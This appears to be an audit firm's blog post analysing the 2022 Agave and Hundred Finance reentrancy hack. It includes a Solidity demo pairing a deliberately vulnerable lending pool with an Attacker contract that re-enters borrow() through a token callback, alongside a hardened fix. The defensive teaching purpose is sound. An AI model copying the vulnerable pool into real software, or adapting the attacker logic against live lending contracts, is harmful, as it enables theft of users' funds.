The Agave and Hundred Finance Hack: A $11.7M Reentrancy Exploit

May 21, 2023
15 min read


The Dual Protocol Attack: A Blockchain Security Nightmare

On March 15, 2022, the cryptocurrency world witnessed a significant breach when two DeFi protocols, Agave DAO and Hundred Finance, fell victim to a sophisticated reentrancy attack. This incident not only highlighted the vulnerabilities inherent in smart contracts but also emphasized the critical need for robust blockchain security measures and comprehensive smart contract audits.

Unraveling the $11.7M Heist

The attack on Agave DAO and Hundred Finance resulted in a staggering loss of $11.7 million, with Agave losing 2116 ETH ($5.5M) and Hundred Finance losing 2363 ETH ($6.2M). This hack marked a significant milestone as it was the first of its kind on the Gnosis (xDai) chain and the first instance where two protocols were directly targeted simultaneously.

The Anatomy of the Attack

Exploiting the xDAI Token Design

The vulnerability the attacker exploited stemmed from the design of the tokens used on the xDAI chain, specifically a function called _callAfterTransfer() that runs as part of every transfer and invokes a callback on the receiving contract. A lending contract that sends tokens to a borrower before it has recorded the resulting debt therefore hands control to that borrower in the middle of the transaction, and this callback was the reentrancy vector the attacker used to manipulate the protocols' lending mechanisms.

The Flash Loan Maneuver

The attacker's strategy began with a flash loan to obtain the initial collateral. Because the token transfer triggered the callback before the protocol had updated the borrower's debt balance, the attacker could re-enter the borrowing logic from inside that callback and take out additional loans against the same collateral, each one passing the collateral check as though no debt existed yet. By the time the debt was written, the attacker had borrowed assets far exceeding the value of their collateral.

A Familiar Attack Vector

Interestingly, this attack bore striking similarities to the $18.8M hack on CREAM Finance in August 2021, which likewise relied on a token transfer callback to re-enter the lending contract before its debt accounting had been updated. This recurrence highlights the persistent nature of certain vulnerabilities in the DeFi space and the importance of learning from past incidents.

Vulnerabilities in the DeFi Ecosystem

The Perils of Code Replication

One of the key issues highlighted by this incident is the inherent risk in the structure of many DeFi projects. The practice of forking existing protocols and reusing code can lead to the propagation of vulnerabilities across multiple projects.

Unexpected Vulnerabilities in New Environments

Even when projects fork strong, well-audited code, transitioning to new environments like xDai can introduce unexpected vulnerabilities. This hack demonstrated that security assumptions that hold in one blockchain environment might not hold in another: lending code that was safe with plain ERC20 collateral became exploitable once the collateral tokens on xDai invoked a callback on every transfer.

Expert Insights and Post-Mortem Analysis

The Need for Comprehensive Security Reviews

Daniel Von Fange, a respected voice in the blockchain security community, emphasized the importance of thorough security audits. He stated, "When one fork falls, all other forks need to re-evaluate their entire infrastructure." This underscores the interconnected nature of DeFi protocols and the ripple effect that vulnerabilities can have across the ecosystem.

Addressing Reentrancy Vulnerabilities

Mudit Gupta, another blockchain security expert, highlighted a crucial strategy for mitigating such attacks. He advocated for following the "checks-effects-interactions pattern" in smart contract development. This approach involves performing all necessary checks and updates to the contract's state before making any external calls, thereby reducing the risk of reentrancy attacks.
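The following Solidity sketch is an added example that is not code from the original post, from Agave, Hundred Finance, Aave or Compound, and not the real xDai bridged-token contracts. It puts the two preceding points side by side: a hypothetical ERC677-style token whose transfer() runs a recipient hook in the manner of _callAfterTransfer(), a pool whose borrow() pays out before writing the debt, the same pool rewritten in checks-effects-interactions order with a mutex as defence in depth, and a borrower contract that re-enters from the hook. All contract, function and variable names (CallbackToken, VulnerablePool, HardenedPool, Attacker, the 50% LTV rule) are illustrative assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical ERC677-style token (assumption, not the real xDai bridge token).
// transfer() notifies a contract recipient through _callAfterTransfer().
interface IERC677Receiver {
    function onTokenTransfer(address from, uint256 value, bytes calldata data) external;
}

contract CallbackToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(uint256 supply) { balanceOf[msg.sender] = supply; }

    function approve(address spender, uint256 value) external returns (bool) {
        allowance[msg.sender][spender] = value;
        return true;
    }

    // Used by the pool to pull collateral; no hook here, which keeps the demo focused.
    function transferFrom(address from, address to, uint256 value) external returns (bool) {
        require(allowance[from][msg.sender] >= value, "allowance");
        allowance[from][msg.sender] -= value;
        _move(from, to, value);
        return true;
    }

    // The recipient hook runs here, in the middle of whatever called transfer().
    function transfer(address to, uint256 value) external returns (bool) {
        _move(msg.sender, to, value);
        _callAfterTransfer(msg.sender, to, value);
        return true;
    }

    function _move(address from, address to, uint256 value) internal {
        require(balanceOf[from] >= value, "balance");
        balanceOf[from] -= value;
        balanceOf[to] += value;
    }

    function _callAfterTransfer(address from, address to, uint256 value) internal {
        if (to.code.length == 0) return;
        (bool ok, ) = to.call(abi.encodeWithSelector(
            IERC677Receiver.onTokenTransfer.selector, from, value, bytes("")));
        if (!ok) { /* a recipient without the hook, or one that reverts, still gets the tokens */ }
    }
}

// Shared collateral bookkeeping; only borrow() differs between the two pools.
// Liquidity is pre-funded by sending tokens to the pool; deposit() posts collateral at 50% LTV.
abstract contract PoolBase {
    CallbackToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;

    constructor(CallbackToken t) { token = t; }

    function deposit(uint256 amount) external {
        require(token.transferFrom(msg.sender, address(this), amount), "pull failed");
        collateral[msg.sender] += amount;
    }

    function borrow(uint256 amount) external virtual;
}

// Interaction before effect: the debt is written only after the token hook has handed
// control to the borrower, so every re-entrant borrow() still sees the old debt.
contract VulnerablePool is PoolBase {
    constructor(CallbackToken t) PoolBase(t) {}

    function borrow(uint256 amount) external override {
        require(debt[msg.sender] + amount <= collateral[msg.sender] / 2, "exceeds LTV"); // check
        require(token.transfer(msg.sender, amount), "payout failed");                   // interaction
        debt[msg.sender] += amount;                                                     // effect (too late)
    }
}

// Checks-effects-interactions, plus a mutex so a re-entrant call fails even if the
// ordering is ever broken again by a later change.
contract HardenedPool is PoolBase {
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }

    constructor(CallbackToken t) PoolBase(t) {}

    function borrow(uint256 amount) external override nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender] / 2, "exceeds LTV"); // check
        debt[msg.sender] += amount;                                                     // effect
        require(token.transfer(msg.sender, amount), "payout failed");                   // interaction
    }
}

// Borrower that re-enters borrow() from the token hook, `rounds` extra times.
contract Attacker is IERC677Receiver {
    CallbackToken private immutable token;
    PoolBase private immutable pool;
    uint256 private loan;
    uint256 public extraRounds;

    constructor(CallbackToken t, PoolBase p) { token = t; pool = p; }

    function attack(uint256 collateralAmount, uint256 rounds) external {
        token.approve(address(pool), collateralAmount);
        pool.deposit(collateralAmount);
        loan = collateralAmount / 2;   // the LTV limit, borrowed once per round
        extraRounds = rounds;
        pool.borrow(loan);
    }

    function onTokenTransfer(address, uint256, bytes calldata) external override {
        if (msg.sender == address(token) && extraRounds > 0) {
            extraRounds--;
            pool.borrow(loan);          // re-enters before the outer borrow() has written debt
        }
    }
}
```

To walk through it: deploy CallbackToken, send 1000 units to a VulnerablePool and 100 to an Attacker wired to that pool, then call attack(100, 3). The outer borrow() passes the LTV check with debt 0 and pays 50; the hook re-enters three more times, and each nested borrow() also sees debt 0, so the attacker walks away with 200 tokens against 100 of collateral and the pool records a debt of 200 that the collateral cannot cover. Against a HardenedPool the first nested borrow() reverts on the mutex (and, had the mutex been absent, on the LTV check, because the debt was already written); the token swallows that revert, the outer call completes, and exactly one 50-token loan is paid. The missing control described later on this page, refusing to list collateral whose transfer invokes a callback, is a third layer: it removes the hook from the picture entirely rather than relying on every code path being ordered correctly.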

Lessons Learned and Prevention Strategies

Rigorous Auditing and Unique Threat Assessments

The Agave and Hundred Finance hack serves as a stark reminder of the importance of rigorous auditing, especially when forking existing protocols. Projects must conduct unique threat assessments that consider the specific environment in which they operate.

Implementing Strict Controls

Both Agave DAO and Hundred Finance, despite being forks of reputable protocols like Aave and Compound, lacked the strict controls necessary to prevent tokens with reentrancy vulnerabilities from being used as collateral. This oversight highlights the need for meticulous security measures, even when building upon established foundations.

Continuous Security Evolution

The recurring nature of similar attacks in the DeFi space emphasizes the need for continuous security evolution. As new vulnerabilities are discovered, it's crucial for all projects to review and update their security measures promptly.

The Broader Implications for Blockchain Security

Rising Threats in Cross-Chain Environments

The Agave and Hundred Finance hack, occurring on the Gnosis (xDai) chain, highlights the growing risks in cross-chain environments, where the bridged representation of a token can behave differently from the original that a protocol was designed and audited against. As blockchain ecosystems become more interconnected, the potential attack surface expands, necessitating more sophisticated security measures.

The Role of Smart Contract Audits

This incident underscores the critical importance of comprehensive smart contract audits. Regular and thorough audits can help identify potential vulnerabilities before they can be exploited, potentially saving millions in losses.

Balancing Innovation and Security

The DeFi space continues to be a hotbed of innovation, but as this hack demonstrates, innovation must be balanced with robust security practices. Projects must prioritize security without stifling the rapid development that characterizes the blockchain industry.

Conclusion: A Wake-Up Call for the DeFi Community

The Agave and Hundred Finance hack serves as a sobering reminder of the vulnerabilities that persist in the DeFi ecosystem. It highlights the need for constant vigilance, comprehensive security measures, and a community-wide commitment to learning from past incidents.

As the blockchain industry continues to evolve, so too must our approach to security. By prioritizing thorough audits, implementing best practices in smart contract development, and fostering a culture of security-first innovation, we can work towards a more resilient and trustworthy DeFi ecosystem.

The lessons learned from this $11.7 million heist are invaluable. They remind us that in the world of blockchain and cryptocurrency, security is not a one-time achievement but an ongoing process of improvement and adaptation.

At Vidma, we understand the critical importance of robust security measures in the blockchain space. Our team of expert smart contract auditors specializes in identifying and mitigating vulnerabilities like those exploited in the Agave and Hundred Finance hack. Visit https://www.vidma.io to learn how we can fortify your blockchain endeavors.

Tags:
#Security-Review #Audit #Hacks